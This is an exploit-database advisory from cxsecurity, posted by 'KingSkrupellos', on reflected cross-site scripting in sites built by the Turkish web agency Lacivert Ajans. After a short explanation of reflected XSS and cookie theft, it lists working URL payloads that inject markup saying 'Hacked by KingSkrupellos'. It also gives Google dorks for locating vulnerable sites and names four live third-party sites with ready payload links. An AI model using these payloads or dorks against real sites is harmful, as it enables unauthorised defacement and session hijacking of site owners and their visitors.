Lacivert Ajans Cross Site Scripting

2019.06.19
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

################################################################### # Exploit Title : Lacivert Ajans Cross Site Scripting # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 19/06/2019 # Vendor Homepage : lacivertajans.com.tr - lacivertgrup.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ] # Google Dorks : intext:2018 Designed by Lacivert Ajans inurl:/?pnum= # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos # Reference Link : cxsecurity.com/ascii/WLB-2019010038 ################################################################### Impact - Reflected XSS Cross Site Scripting (or Non-Persistent) : ********************************************************* The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim,the content is executed by the victim's browser. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected site and allow the attacker to access sensitive browser-based information. An attacker, for example,can exploit this vulnerability to steal cookies from the attacked user in order to hijack a session and gain access to the system. ################################################################### # Reflected Cross Site Scripting XSS Exploits and Payloads : ******************************************************* /?Syf=21&pt=1%27"></h3></tr></td></table></tr></td> </table></div><marquee>XSS-Vulnerability-Found-By-KingSkrupellos /?Syf=21&pt=1%27%3Cmarquee%3E%3Cfont%20color= lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E /?Syf=[ID-NUMBER]&pt=1%27"></h3></tr></td></table> </tr></td></table></div><marquee>XSS-Vulnerability-Found-By-KingSkrupellos /?pnum=1&pt=1&pt=1%27%3Cmarquee %3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20 KingSkrupellos%3C/font%3E%3C/marquee%3E /?SyfNmb=2&pt=1%27<marquee><font%20color=lime%20size= 32>XSS-Vulnerability-Found%20By%20KingSkrupellos</font></marquee> ################################################################### # Example Vulnerable Sites : ************************* [+] akgulraf.com/?pnum=1&pt=1%27<marquee><font%20color= lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee> [+] tercihozelegitim.com/?pnum=15&pt=1&pt=1%27%3Cmarquee %3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20 KingSkrupellos%3C/font%3E%3C/marquee%3E [+] ozkeklik.com.tr/?pnum=6&pt=1%27<marquee><font%20color= lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee> [+] lacivertajans.com.tr/?pnum=55&pt=1&pt=1%27%3Cmarquee %3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20 KingSkrupellos%3C/font%3E%3C/marquee%3E ################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ###################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top